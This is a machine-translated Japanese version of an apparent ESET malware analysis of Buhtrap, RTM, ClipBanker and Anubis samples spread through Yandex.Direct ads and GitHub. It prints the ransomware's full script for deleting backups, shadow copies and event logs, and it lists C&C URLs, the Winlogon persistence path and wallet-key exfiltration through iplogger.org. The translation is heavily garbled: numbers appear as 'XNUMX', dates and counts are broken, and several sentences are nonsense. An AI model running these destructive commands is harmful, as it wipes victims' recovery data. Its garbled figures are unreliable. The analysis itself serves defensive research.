バックドアと Buhtrap 暗号化プログラムは Yandex.Direct を使用して配布されました。

会計士をサイバー攻撃のターゲットにするには、会計士がオンラインで検索した仕事文書を使用できます。 これは、あるサイバーグループが過去数か月間にわたって既知のバックドアを配布してきたこととほぼ同じです。 ブトラップ и RTM、暗号通貨を盗むための暗号化装置とソフトウェアも同様です。 ほとんどの標的はロシアにあります。 この攻撃は、Yandex.Direct に悪意のある広告を掲載することによって実行されました。 潜在的な被害者は Web サイトに誘導され、文書テンプレートを装った悪意のあるファイルをダウンロードするよう求められました。 Yandex は私たちの警告の後、悪意のある広告を削除しました。

Buhtrap のソースコードは過去にオンラインに流出しており、誰でも使用できるようになっています。 RTM コードの利用可能性に関する情報はありません。

この投稿では、攻撃者がどのようにして Yandex.Direct を使用してマルウェアを配布し、GitHub でホストしたかについて説明します。 この投稿は、マルウェアの技術分析で終わります。

Buhtrap と RTM がビジネスを再開

蔓延のメカニズムと被害者

被害者に配信されるさまざまなペイロードは、共通の伝播メカニズムを共有しています。 攻撃者によって作成されたすべての悪意のあるファイルは、XNUMX つの異なる GitHub リポジトリに配置されました。

通常、リポジトリには、頻繁に変更される、ダウンロード可能な悪意のあるファイルが 24 つ含まれていました。 GitHubではリポジトリの変更履歴を閲覧できるため、一定期間にどのようなマルウェアが配布されたのかを知ることができます。 被害者に悪意のあるファイルをダウンロードさせるために、上の図に示す Web サイトblanki-shabloniXNUMX[.]ruが使用されました。

サイトのデザインと悪意のあるファイルの名前はすべて、フォーム、テンプレート、契約書、サンプルなどの単一の概念に従っています。Buhtrap と RTM ソフトウェアが過去に会計士に対する攻撃にすでに使用されていることを考慮すると、新しいキャンペーンの戦略は同じです。 唯一の問題は、被害者がどのようにして攻撃者のサイトにたどり着いたのかということです。

感染

このサイトにたどり着いた潜在的な被害者のうち少なくとも数人は、悪意のある広告に惹かれていました。 以下は URL の例です。

https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456

リンクからわかるように、バナーは正規の会計フォーラム bb.f2[.]kz に投稿されました。 バナーはさまざまなサイトに表示され、すべて同じキャンペーン ID (blanki_rsya) を持ち、そのほとんどが会計または法務支援サービスに関連していることに注意することが重要です。 URL は、潜在的な被害者が「請求書フォームのダウンロード」というリクエストを使用したことを示しており、これは標的型攻撃の仮説を裏付けています。 以下は、バナーが表示されたサイトと、対応する検索クエリです。

• 請求書フォームをダウンロード – bb.f2[.]kz
• サンプル契約書 - Ipopen[.]ru
• アプリケーションの苦情サンプル - 77metrov[.]ru
• 契約書 - 空白-dogovor-kupli-prodazhi[.]ru
• 法廷嘆願書のサンプル - zen.yandex[.]ru
• 苦情のサンプル - yurday[.]ru
• サンプル契約フォーム – Regforum[.]ru
• 契約フォーム –Assistentus[.]ru
• アパート契約書のサンプル – napravah[.]com
• 法的契約書のサンプル - avito[.]ru

blanki-shabloni24[.]ru サイトは、簡単な視覚的評価に合格するように構成されている可能性があります。 通常、GitHub へのリンクを含むプロフェッショナルなサイトを指す広告は、明らかに悪いものとは思えません。 さらに、攻撃者は、キャンペーン期間中と思われる限られた期間のみ、悪意のあるファイルをリポジトリにアップロードしました。 ほとんどの場合、GitHub リポジトリには空の zip アーカイブまたは空の EXE ファイルが含まれていました。 したがって、攻撃者は、特定の検索クエリに応答して訪れた会計士が訪問する可能性が最も高いサイトに、Yandex.Direct を通じて広告を配布する可能性があります。

次に、この方法で分散されたさまざまなペイロードを見てみましょう。

ペイロード分析

配布年表

この悪意のあるキャンペーンは 2018 年 XNUMX 月末に始まり、この記事の執筆時点では活動中です。 リポジトリ全体が GitHub で公開されていたため、XNUMX つの異なるマルウェア ファミリの配布の正確なタイムラインをまとめました (下図を参照)。 git 履歴と比較するために、ESET テレメトリによって測定されたバナー リンクがいつ検出されたかを示す行を追加しました。 ご覧のとおり、これは GitHub 上のペイロードの可用性とよく相関しています。 XNUMX 月末の矛盾は、リポジトリを完全に取得する前に GitHub から削除されたため、変更履歴の一部が存在しなかったという事実によって説明できます。

図 1. マルウェア配布の年表。

コード署名証明書

キャンペーンでは複数の証明書が使用されました。 一部は複数のマルウェア ファミリによって署名されており、これはさらに、異なるサンプルが同じキャンペーンに属していたことを示しています。 秘密キーが利用可能であるにもかかわらず、オペレーターはバイナリに体系的に署名せず、すべてのサンプルにキーを使用しませんでした。 2019 年 XNUMX 月下旬、攻撃者は秘密キーを持っていない Google 所有の証明書を使用して無効な署名を作成し始めました。

キャンペーンに関係するすべての証明書と、それらが署名するマルウェア ファミリを以下の表に示します。

また、これらのコード署名証明書を使用して、他のマルウェア ファミリとのリンクを確立しました。 ほとんどの証明書については、GitHub リポジトリを通じて配布されていないサンプルは見つかりませんでした。 ただし、TOV「MARIYA」証明書は、ボットネットに属するマルウェアの署名に使用されました。 ワウチョス、アドウェアとマイナー。 このマルウェアがこのキャンペーンに関連している可能性は低いです。 おそらく、証明書はダークネットで購入されたものと思われます。

Win32/Filecoder.Buhtrap

私たちの注意を引いた最初のコンポーネントは、新しく発見された Win32/Filecoder.Buhtrap でした。 これは、パッケージ化されることがある Delphi バイナリ ファイルです。 主に2019年XNUMX月～XNUMX月に配信されました。 ランサムウェア プログラムにふさわしい動作をし、ローカル ドライブとネットワーク フォルダーを検索し、検出されたファイルを暗号化します。 暗号化キーを送信するためにサーバーに接続しないため、インターネット接続が侵害される必要はありません。 代わりに、身代金メッセージの末尾に「トークン」を追加し、電子メールまたは Bitmessage を使用してオペレーターに連絡することを提案します。

できるだけ多くの機密リソースを暗号化するために、Filecoder.Buhtrap は、暗号化を妨げる可能性のある貴重な情報を含むファイル ハンドラーを開いている可能性のある主要なソフトウェアをシャットダウンするように設計されたスレッドを実行します。 対象となるプロセスは主にデータベース管理システム（DBMS）です。 さらに、Filecoder.Buhtrap はログ ファイルとバックアップを削除して、データの回復を困難にします。 これを行うには、以下のバッチ スクリプトを実行します。

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled

Filecoder.Buhtrap は、Web サイト訪問者に関する情報を収集するために設計された正規のオンライン IP Logger サービスを使用します。 これは、ランサムウェアの被害者を追跡することを目的としており、コマンド ラインが責任を負います。

mshta.exe "javascript:document.write('');"

暗号化対象のファイルは、XNUMX つの除外リストに一致しない場合に選択されます。 まず、拡張子が .com、.cmd、.cpl、.dll、.exe、.hta、.lnk、.msc、.msi、.msp、.pif、.scr、.sys のファイルは暗号化されません。 。コウモリ。 次に、フルパスに以下のリストのディレクトリ文字列が含まれるすべてのファイルが除外されます。

.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel

第三に、特定のファイル名も暗号化から除外されます。その中には身代金メッセージのファイル名も含まれます。 リストを以下に示します。 明らかに、これらの例外はすべて、マシンの稼働を維持することを目的としていますが、路上走行可能性は最小限に抑えられています。

boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe

ファイル暗号化方式

マルウェアが実行されると、512 ビットの RSA キー ペアが生成されます。 次に、秘密指数 (d) と法 (n) は、ハードコードされた 2048 ビットの公開キー (公開指数と法) で暗号化され、zlib パックされ、base64 でエンコードされます。 これを担当するコードを図 2 に示します。

図 2. 512 ビット RSA キー ペア生成プロセスの Hex-Rays 逆コンパイルの結果。

以下は、生成された秘密キー (身代金メッセージに添付されたトークン) を含むプレーン テキストの例です。

DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239

攻撃者の公開鍵は以下に示されています。

e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD

ファイルは、128 ビット キーを使用した AES-256-CBC を使用して暗号化されます。 暗号化されたファイルごとに、新しいキーと新しい初期化ベクトルが生成されます。 鍵情報は暗号化されたファイルの末尾に付加されます。 暗号化されたファイルの形式を考えてみましょう。
暗号化されたファイルには次のヘッダーがあります。

VEGA マジック値が追加されたソース ファイル データは、最初の 0x5000 バイトまで暗号化されます。 すべての復号化情報は、次の構造のファイルに添付されます。

- ファイル サイズ マーカーには、ファイルのサイズが 0x5000 バイトより大きいかどうかを示すマークが含まれています
— AES キー BLOB = ZlibCompress(RSAEncrypt(AES キー + IV、生成された RSA キー ペアの公開キー))
- RSA キー BLOB = ZlibCompress(RSAEncrypt(生成された RSA 秘密キー、ハードコーディングされた RSA 公開キー))

Win32/クリップバンカー

Win32/ClipBankerは、2018年4月下旬からXNUMX月上旬にかけて断続的に配布されたコンポーネントです。 その役割はクリップボードの内容を監視し、暗号通貨ウォレットのアドレスを探すことです。 ターゲットのウォレットのアドレスを特定すると、ClipBanker はそれをオペレーターに属すると思われるアドレスに置き換えます。 私たちが調べたサンプルはボックス化も難読化もされていませんでした。 動作をマスクするために使用される唯一のメカニズムは文字列暗号化です。 オペレーターのウォレットのアドレスは RCXNUMX を使用して暗号化されます。 対象となる仮想通貨はビットコイン、ビットコインキャッシュ、ドージコイン、イーサリアム、リップルです。

マルウェアが攻撃者のビットコイン ウォレットに拡散していた期間中に、少量が VTS に送信されたため、キャンペーンの成功には疑問が生じています。 さらに、これらの取引が ClipBanker に関連していたことを示唆する証拠はまったくありません。

Win32/RTM

Win32/RTM コンポーネントは、2019 年 2017 月初旬に数日間配布されました。 RTM は、リモート バンキング システムを目的とした Delphi で書かれたトロイの木馬バンカーです。 XNUMX 年に、ESET の研究者は次の論文を発表しました。 詳細な分析 このプログラムの説明は依然として有効です。 2019 年 XNUMX 月には、パロアルトネットワークスもリリースしました RTM に関するブログ投稿.

ブトラップローダー

しばらくの間、以前の Buhtrap ツールとは似ていないダウンローダーが GitHub で利用可能でした。 彼は振り返って https://94.100.18[.]67/RSS.php?<some_id> 次のステージを取得し、それをメモリに直接ロードします。 第 XNUMX 段階のコードの XNUMX つの動作を区別できます。 最初の URL では、RSS.php が Buhtrap バックドアを直接渡しました。このバックドアは、ソース コードが漏洩した後に利用可能になったものと非常によく似ています。

興味深いことに、Buhtrap バックドアを使用したキャンペーンがいくつか確認されており、それらは異なるオペレーターによって実行されているとされています。 この場合の主な違いは、バックドアがメモリに直接ロードされ、先ほど説明した DLL 展開プロセスで通常のスキームを使用しないことです。 前。 さらに、オペレーターは、C&C サーバーへのネットワーク トラフィックの暗号化に使用される RC4 キーを変更しました。 私たちがこれまで見てきたキャンペーンのほとんどでは、オペレーターはわざわざこのキーを変更しませんでした。

XNUMX 番目のより複雑な動作は、RSS.php URL が別のローダーに渡されることでした。 動的インポート テーブルの再構築など、いくつかの難読化が実装されました。 ブートローダーの目的は、C&C サーバーに接続することです。 msiオフィスアップ[.]com/api/F27F84EDA4D13B15/2、ログを送信し、応答を待ちます。 応答を BLOB として処理し、メモリにロードして実行します。 このローダーを実行しているときに確認されたペイロードは同じ Buhtrap バックドアでしたが、他のコンポーネントが存在する可能性があります。

アンドロイド/スパイ.バンカー

興味深いことに、Android 用のコンポーネントも GitHub リポジトリで見つかりました。 彼が本店にいたのは 1 年 2018 月 XNUMX 日の XNUMX 日だけでした。 GitHub に投稿されたことを除けば、ESET テレメトリーでは、このマルウェアが配布された証拠は見つかりませんでした。

コンポーネントは Android アプリケーション パッケージ (APK) としてホストされました。 かなり難読化されています。 悪意のある動作は、APK 内にある暗号化された JAR に隠されています。 次のキーを使用して RC4 で暗号化されます。

key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]

文字列の暗号化には同じキーとアルゴリズムが使用されます。 JAR は次の場所にあります APK_ROOT + image/files。 ファイルの最初の 4 バイトには暗号化された JAR の長さが含まれており、長さフィールドの直後から始まります。

ファイルを復号化したところ、それが Anubis であることがわかりました。 文書化された Android 用バンカー。 このマルウェアには次のような特徴があります。

• マイク録音
• スクリーンショットを撮る
• GPS 座標を取得する
• キーロガー
• デバイスデータの暗号化と身代金要求
• スパム行為

興味深いことに、銀行家は別の C&C サーバーを取得するためのバックアップ通信チャネルとして Twitter を使用しました。 私たちが分析したサンプルでは @JonesTrader アカウントが使用されていましたが、分析時点ではすでにブロックされていました。

バンカーには、Android デバイス上のターゲット アプリケーションのリストが含まれています。 これは、ソフォスの調査で得られたリストよりも長いです。 このリストには、多くの銀行アプリケーション、Amazon や eBay などのオンライン ショッピング プログラム、暗号通貨サービスが含まれています。

MSIL/クリップバンカー.IH

このキャンペーンの一環として配布された最後のコンポーネントは、2019 年 1.0.0 月に登場した .NET Windows 実行可能ファイルでした。 調査したバージョンのほとんどは、ConfuserEx vXNUMX にパッケージ化されていました。 ClipBanker と同様に、このコンポーネントはクリップボードを使用します。 彼の目標は、幅広い仮想通貨と Steam でのオファーです。 さらに、IP Logger サービスを使用して、ビットコイン秘密 WIF キーを盗みます。

保護メカニズム
ConfuserEx は、デバッグ、ダンプ、改ざんを防止するという利点に加えて、ウイルス対策製品や仮想マシンを検出する機能も備えています。

仮想マシンで実行されていることを確認するために、マルウェアは組み込みの Windows WMI コマンド ライン (WMIC) を使用して BIOS 情報を要求します。つまり、次のとおりです。

wmic bios

次に、プログラムはコマンド出力を解析し、VBOX、VirtualBox、XEN、qemu、bochs、VM のキーワードを検索します。

ウイルス対策製品を検出するために、マルウェアは Windows Management Instrumentation (WMI) 要求を Windows セキュリティ センターに送信します。 ManagementObjectSearcher 以下に示すような API です。 Base64 からデコードした後の呼び出しは次のようになります。

ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')

図 3. ウイルス対策製品を特定するプロセス。

さらに、マルウェアは次のことをチェックします。 クリプトクリップウォッチャー、クリップボード攻撃から保護するツールであり、実行されている場合は、そのプロセス内のすべてのスレッドを一時停止して、保護を無効にします。

持続性

私たちが調査したマルウェアのバージョンは自分自身をコピーします %APPDATA%googleupdater.exe そして、Google ディレクトリに「hidden」属性を設定します。 それから彼女は値を変更します SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell Windows レジストリにパスを追加します updater.exe。 このようにして、ユーザーがログインするたびにマルウェアが実行されます。

悪意のある行為

ClipBanker と同様に、このマルウェアはクリップボードの内容を監視して暗号通貨ウォレットのアドレスを探し、見つかった場合はオペレーターのアドレスの XNUMX つに置き換えます。 以下は、コード内で見つかった内容に基づいたターゲット アドレスのリストです。

BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL

アドレスの種類ごとに、対応する正規表現があります。 バッファ内の定義に使用されている正規表現からわかるように、STEAM_URL 値は Steam システムを攻撃するために使用されます。

b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b

漏洩チャネル

このマルウェアは、バッファ内のアドレスを置き換えるだけでなく、ビットコイン、ビットコイン コア、およびエレクトラム ビットコイン ウォレットの秘密 WIF キーをターゲットにします。 このプログラムは、WIF 秘密キーを取得するための流出チャネルとして plogger.org を使用します。 これを行うには、以下に示すように、オペレーターは秘密鍵データを User-Agent HTTP ヘッダーに追加します。

図 4. 出力データを含む IP Logger コンソール。

オペレーターはウォレットの流出に iplogger.org を使用しませんでした。 おそらくフィールドの 255 文字制限により、別の方法に頼ったのでしょう。 User-AgentIP Logger Web インターフェイスに表示されます。 私たちが調査したサンプルでは、​​他の出力サーバーは環境変数に保存されていました。 DiscordWebHook。 驚くべきことに、この環境変数はコード内のどこにも割り当てられていません。 これは、マルウェアがまだ開発中であり、変数がオペレーターのテスト マシンに割り当てられていることを示唆しています。

プログラムが開発中であることを示す別の兆候があります。 バイナリ ファイルには XNUMX つの iplogger.org URL が含まれており、データが抽出されるときに両方ともクエリされます。 これらの URL のいずれかへのリクエストでは、Referer フィールドの値の前に「DEV /」が付きます。 ConfuserEx を使用してパッケージ化されていないバージョンも見つかりました。この URL の受信者は DevFeedbackUrl という名前です。 環境変数名に基づいて、オペレーターは正規サービス Discord とその Web 傍受システムを使用して、暗号通貨ウォレットを盗むことを計画していると考えられます。

まとめ

このキャンペーンは、サイバー攻撃における正規の広告サービスの使用の一例です。 この計画はロシアの組織を標的にしていますが、ロシア以外のサービスを使用したこのような攻撃があっても驚かないでしょう。 侵害を避けるために、ユーザーはダウンロードするソフトウェアのソースの評判に自信を​​持っている必要があります。

侵害の兆候と MITRE ATT&CK 属性の完全なリストは、次の場所で入手できます。 リンク.

出所： habr.com